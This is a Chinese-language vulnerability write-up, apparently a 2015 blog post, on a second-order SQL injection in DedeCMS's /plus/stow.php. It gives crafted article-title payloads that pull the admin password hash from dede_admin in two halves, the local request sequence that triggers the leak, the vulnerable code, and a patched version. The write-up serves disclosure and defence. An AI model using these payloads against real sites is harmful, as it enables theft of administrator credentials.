dedecms /plus/stow.php Twice SQL Injection

Andrew.Hann發表於2015-05-19

catalog

1. 漏洞描述
2. 漏洞觸發條件
3. 漏洞影響範圍
4. 漏洞程式碼分析
5. 防禦方法
6. 攻防思考

 

1. 漏洞描述

收藏文章功能$title變數未過濾,造成二次注入

Relevant Link:

http://www.wooyun.org/bugs/wooyun-2013-046375


2. 漏洞觸發條件

0x1: 釋出一個特殊構造標題的文章

http://127.0.0.1/dedecms5.5/member/content_list.php?channelid=1
//文章標題如下,目的是額外注入了一條可以查詢出管理員密碼的SQL語句
u',char(@`'`), (select pwd from dede_admin))#

0x2: 提交收藏請求

獲取剛才釋出文章的aid。例如aid=108,針對這篇文章發起收藏請求
http://localhost/dedecms5.5/plus/stow.php?aid=108&type=001 

0x3: 發起剛才釋出的文章的"推薦"請求

http://localhost/dedecms5.5/member/mystow.php
//點選剛才釋出的文章的"推薦"連結,開啟如下連線
http://localhost/dedecms5.5/plus/recommend.php?type=29a53fb3c3&aid=108
//其中type=29a53fb3c3的"29a53fb3c3"為向dede_admin.pwd欄位的前10位,這個時候二次注入就已經發生了

0x4: 注入後10位

後10位使用類似的步驟,不同的是釋出的文章標題為
u',char(@`'`),substring((select pwd from dede_admin),11))#

Relevant Link:

http://www.wooyun.org/bugs/wooyun-2013-046375


3. 漏洞影響範圍
4. 漏洞程式碼分析

/plus/stow.php

..
$row = $dsql->GetOne("Select * From `#@__member_stow` where aid='$aid' And mid='{$ml->M_ID}' ");

if(!is_array($row))
{
    //這裡的TITLE是從資料庫裡查詢出來的,也就是我們釋出的文章的標題
    $dsql->ExecuteNoneQuery(" INSERT INTO `#@__member_stow`(mid,aid,title,addtime) VALUES ('".$ml->M_ID."','$aid','".$title."','$addtime'); ");
}
..

Relevant Link:

http://www.wooyun.org/bugs/wooyun-2014-048913


5. 防禦方法

/plus/stow.php

<?php
require_once(dirname(__FILE__)."/../include/common.inc.php");

$aid = ( isset($aid) && is_numeric($aid) ) ? $aid : 0;
$type=empty($type)? "" : HtmlReplace($type,1);
if($aid==0)
{
    ShowMsg('文件id不能為空!','javascript:window.close();');
    exit();
}

require_once(DEDEINC."/memberlogin.class.php");
$ml = new MemberLogin();

if($ml->M_ID==0)
{
    ShowMsg('只有會員才允許收藏操作!','javascript:window.close();');
    exit();
}


//讀取文件資訊
$arcRow = GetOneArchive($aid);
if($arcRow['aid']=='')
{
    ShowMsg("無法收藏未知文件!","javascript:window.close();");
    exit();
}
extract($arcRow, EXTR_SKIP);
/**/
$title = HtmlReplace($title,1);
$aid = intval($aid);
/**/
$addtime = time();
if($type==''){
    $row = $dsql->GetOne("Select * From `#@__member_stow` where aid='$aid' And mid='{$ml->M_ID}' AND type='' ");
    if(!is_array($row))
    {
        $dsql->ExecuteNoneQuery("INSERT INTO `#@__member_stow`(mid,aid,title,addtime) VALUES ('".$ml->M_ID."','$aid','".addslashes($arctitle)."','$addtime'); ");
  }
}else{
    $row = $dsql->GetOne("Select * From `#@__member_stow` where type='$type' and (aid='$aid' And mid='{$ml->M_ID}')");
  if(!is_array($row)){
      $dsql->ExecuteNoneQuery(" INSERT INTO `#@__member_stow`(mid,aid,title,addtime,type) VALUES ('".$ml->M_ID."','$aid','$title','$addtime','$type'); ");
  }
}

//更新使用者統計
$row = $dsql->GetOne("SELECT COUNT(*) AS nums FROM `#@__member_stow` WHERE `mid`='{$ml->M_ID}' ");
$dsql->ExecuteNoneQuery("UPDATE #@__member_tj SET `stow`='$row[nums]' WHERE `mid`='".$ml->M_ID."'");

ShowMsg('成功收藏一篇文件!','javascript:window.close();');
?>


6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

 

相關文章